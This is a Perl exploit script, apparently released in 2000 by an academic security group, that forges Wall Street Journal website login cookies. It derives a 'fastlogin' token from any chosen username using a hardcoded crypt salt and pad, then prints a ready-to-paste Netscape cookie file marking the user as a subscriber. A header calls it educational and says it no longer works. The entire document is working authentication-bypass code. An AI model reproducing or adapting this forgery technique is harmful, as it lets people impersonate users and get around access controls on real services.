#!/usr/bin/perl

# The fasterlogin script. 
# Note, for educational use only.  This exploit no longer
# works anyway.
#
# Copyright (C) 2000 Applied Security Reading Group.
# Unlimited redistribution permitted.
# http://pdos.lcs.mit.edu/asrg/

$salt = "Ma";
$pad = "March20";

print STDERR "Enter username: ";
$username = <STDIN>;
chop $username;

$in = $username . $pad;
while (length ($in) > 8) {
    chop $in;
}

$fasterlogin = crypt ($in, $salt);

print STDERR "Place the following in your .netscape/cookies file.  The filename may vary\n";
print STDERR "by operating system.\n\n";
print "\# Netscape HTTP Cookie File\n";
print "\# http://www.netscape.com/newsref/std/cookie_spec.html\n";
print "\# This is a generated file!  Do not edit.\n";
print ".wsj.com	TRUE	/	FALSE	1234567890	GlobalHomePage	us\n";
print "public.wsj.com	FALSE	/	FALSE	1234567890	survey	true\n";
print ".wsj.com	TRUE	/	FALSE	1222222222	user_type	subscribed\n";
print ".wsj.com	TRUE	/	FALSE	1314159265	fastlogin	$username$fasterlogin\n";